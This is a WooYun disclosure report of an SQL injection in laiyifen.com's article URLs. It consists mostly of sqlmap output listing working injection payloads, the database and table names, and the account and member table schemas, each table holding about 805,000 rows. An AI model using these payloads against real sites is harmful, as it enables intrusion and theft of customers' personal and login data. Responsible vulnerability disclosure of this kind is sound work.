乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-19: 细节已通知厂商并且等待厂商处理中 2014-11-19: 厂商已经确认,细节仅向厂商公开 2014-11-29: 细节向核心白帽子及相关领域专家公开 2014-12-09: 细节向普通白帽子公开 2014-12-19: 细节向实习白帽子公开 2015-01-03: 细节向公众公开
来伊份作为中国休闲食品连锁零售业的领导品牌,目前在上海、江苏、浙江等9个省、直辖市拥有近2400家专卖店,每年为近6000万人次提供优质食品。从1999年第一家门店开业起,来伊份陆续推出过炒货、肉制品等9大系列700多种食品。2013年销售额超过30亿,全国员工人数近1万名。“三好一公道”是来伊份的经营理念,即品质好、味道好、服务好和价格公道。
注入点说明:(星号部分为注入点)
GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1Referer: http://www.laiyifen.com:80/Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310Host: www.laiyifen.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---current user: '[email protected].%.%'current database: 'laiyifendb'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---available databases [3]:[*] information_schema[*] laiyifendb[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---Database: laiyifendb[176 tables]+-----------------------------------------+| app_default_info || awardlist || awardlist_copy || collect_shop || ds_0303_add || ds_0303_payment || ds_0303_ptype || ds_0303_rpcpoll || ds_ectools_analysis_logs || ds_ectools_analysis_logs_2 || ds_guajian_1 || luck_log || luck_log_mobile || member_lucknum || mobile_promotion_goods || moblie_luck_num || sdb_aftersales_return_product || sdb_authenticator_clients || sdb_authenticator_logs || sdb_authenticator_requestlist || sdb_b2c_bcompany || sdb_b2c_brand || sdb_b2c_cart || sdb_b2c_cart_objects || sdb_b2c_comment_goods_point || sdb_b2c_comment_goods_type || sdb_b2c_counter || sdb_b2c_counter_attach || sdb_b2c_coupons || sdb_b2c_delivery || sdb_b2c_delivery_items || sdb_b2c_dly_h_area || sdb_b2c_dlycorp || sdb_b2c_dlytype || sdb_b2c_ecpool || sdb_b2c_ecpool_mobile || sdb_b2c_excard_rule || sdb_b2c_excard_used || sdb_b2c_fbtad || sdb_b2c_goods || sdb_b2c_goods_cat || sdb_b2c_goods_keywords || sdb_b2c_goods_lv_price || sdb_b2c_goods_promotion_ref || sdb_b2c_goods_rate || sdb_b2c_goods_spec_index || sdb_b2c_goods_type || sdb_b2c_goods_type_props || sdb_b2c_goods_type_props_value || sdb_b2c_goods_type_spec || sdb_b2c_goods_virtual_cat || sdb_b2c_history_orders || sdb_b2c_history_products || sdb_b2c_huodong_log || sdb_b2c_huodongda || sdb_b2c_jiang || sdb_b2c_jiang_huodong || sdb_b2c_jiang_log || sdb_b2c_jiang_members || sdb_b2c_lulu_card || sdb_b2c_member_addrs || sdb_b2c_member_advance || sdb_b2c_member_comments || sdb_b2c_member_coupon || sdb_b2c_member_goods || sdb_b2c_member_lv || sdb_b2c_member_msg || sdb_b2c_member_point || sdb_b2c_member_pwdlog || sdb_b2c_member_systmpl || sdb_b2c_members || sdb_b2c_meng_buy_1 || sdb_b2c_meng_good_gift || sdb_b2c_meng_luck_reg || sdb_b2c_meng_send || sdb_b2c_order_coupon_user || sdb_b2c_order_delivery || sdb_b2c_order_items || sdb_b2c_order_log || sdb_b2c_order_objects || sdb_b2c_order_pmt || sdb_b2c_orders || sdb_b2c_products || sdb_b2c_recharge_log || sdb_b2c_reship || sdb_b2c_reship_items || sdb_b2c_sales_baifendian || sdb_b2c_sales_bangdingsp || sdb_b2c_sales_freeShipping || sdb_b2c_sales_rule_goods || sdb_b2c_sales_rule_order || sdb_b2c_sell_logs || sdb_b2c_shop || sdb_b2c_single || sdb_b2c_spec_values || sdb_b2c_specification || sdb_b2c_type_brand || sdb_b2copenapi_api_fail || sdb_b2copenapi_api_log || sdb_b2copenapi_api_log_copy || sdb_b2copenapi_api_mobile_logs || sdb_b2copenapi_request_shops || sdb_base_app_content || sdb_base_apps || sdb_base_cache_expires || sdb_base_files || sdb_base_kvstore || sdb_base_network || sdb_base_queue || sdb_base_rpcnotify || sdb_base_rpcpoll || sdb_base_task || sdb_content_article_bodys || sdb_content_article_indexs || sdb_content_article_nodes || sdb_couponlog_order_coupon_ref || sdb_couponlog_order_coupon_user || sdb_dbeav_meta_register || sdb_dbeav_meta_value_datetime || sdb_dbeav_meta_value_decimal || sdb_dbeav_meta_value_int || sdb_dbeav_meta_value_longtext || sdb_dbeav_meta_value_text || sdb_dbeav_meta_value_varchar || sdb_dbeav_recycle || sdb_desktop_filter || sdb_desktop_flow || sdb_desktop_hasrole || sdb_desktop_menus || sdb_desktop_recycle || sdb_desktop_role_flow || sdb_desktop_roles || sdb_desktop_tag || sdb_desktop_tag_rel || sdb_desktop_user_flow || sdb_desktop_users || sdb_ectools_analysis || sdb_ectools_analysis_logs || sdb_ectools_currency || sdb_ectools_order_bills || sdb_ectools_payments || sdb_ectools_refunds || sdb_ectools_regions || sdb_gift_cat || sdb_gift_ref || sdb_giftpackage_giftpackage || sdb_giftpackage_order_ref || sdb_image_image || sdb_image_image_attach || sdb_operatorlogmanage_logs || sdb_operatorlogmanage_register || sdb_pam_account || sdb_pam_auth || sdb_pam_log || sdb_pointprofessional_member_point_task || sdb_recommended_goods || sdb_recommended_goods_period || sdb_search_search || sdb_site_explorers || sdb_site_link || sdb_site_menus || sdb_site_modules || sdb_site_route_statics || sdb_site_seo || sdb_site_themes || sdb_site_themes_tmpl || sdb_site_widgets || sdb_site_widgets_instance || sdb_site_widgets_proinstance || sdb_timedbuy_objitems || shoplist || swjiang_contect || swjiang_contect_copy || tbasarea || tbaschildarea || tbasthirdarea |+-----------------------------------------+
Database: laiyifendbTable: sdb_pam_account[9 columns]+----------------+-----------------------+| Column | Type |+----------------+-----------------------+| account_id | mediumint(8) unsigned || account_type | varchar(30) || createtime | int(10) unsigned || disabled | enum('true','false') || hmlogin | enum('false','true') || hmupdate | enum('0','1') || login_name | varchar(100) || login_password | varchar(32) || openlogin | varchar(60) |+----------------+-----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---Database: laiyifendb+-----------------+---------+| Table | Entries |+-----------------+---------+| sdb_pam_account | 805856 |+-----------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---Database: laiyifendbTable: sdb_b2c_members[70 columns]+----------------+-----------------------+| Column | Type |+----------------+-----------------------+| addon | longtext || addr | varchar(255) || advance | decimal(20,3) || advance_freeze | decimal(20,3) || anyolife_uname | varchar(100) || area | varchar(255) || b_day | tinyint(3) unsigned || b_month | tinyint(3) unsigned || b_year | smallint(5) unsigned || bind_time | int(10) unsigned || biz_money | decimal(20,3) || card_no | varchar(20) || card_type | varchar(45) || cert_no | varchar(100) || cert_type | varchar(200) || cur | varchar(20) || custom | longtext || disabled | enum('true','false') || education | varchar(45) || email | varchar(200) || end_date | int(10) unsigned || experience | int(10) || family_mem | varchar(45) || fav_tags | longtext || firstname | varchar(50) || foreign_id | varchar(255) || interest | longtext || is_card | enum('0','1') || is_upload | enum('0','1') || job | varchar(200) || lang | varchar(20) || last_loginip | varchar(16) || last_logintime | int(10) unsigned || lastname | varchar(50) || login_count | int(11) || login_source | varchar(45) || member_id | mediumint(8) unsigned || member_lv_id | mediumint(8) unsigned || member_refer | varchar(50) || mobile | varchar(30) || month_income | varchar(45) || name | varchar(50) || nation | varchar(45) || order_num | mediumint(8) unsigned || pay_time | mediumint(8) unsigned || point | int(10) || point_freeze | mediumint(8) unsigned || point_history | mediumint(8) unsigned || refer_id | varchar(50) || refer_url | varchar(200) || reg_ip | varchar(16) || reg_source | varchar(45) || regtime | int(10) unsigned || remark | text || remark_type | varchar(2) || score_rate | decimal(5,3) || sex | enum('0','1','2') || state | tinyint(1) || sum_pointtotal | decimal(20,3) || tel | varchar(30) || unreadmsg | smallint(5) unsigned || use_total | decimal(20,3) || vipapply_no | varchar(45) || vipapply_time | int(10) unsigned || vipcard_no | varchar(45) || vipcard_pwd | varchar(45) || vipinfo_no | varchar(20) || vocation | varchar(50) || wedlock | enum('0','1') || zip | varchar(20) |+----------------+-----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html---Database: laiyifendb+-----------------+---------+| Table | Entries |+-----------------+---------+| sdb_b2c_members | 805876 |+-----------------+---------+
具体数据我就不dump了。
加强参数过滤。
危害等级:中
漏洞Rank:8
确认时间:2014-11-19 17:20
非常感谢乌云和pandada的支持,非常感谢!
暂无
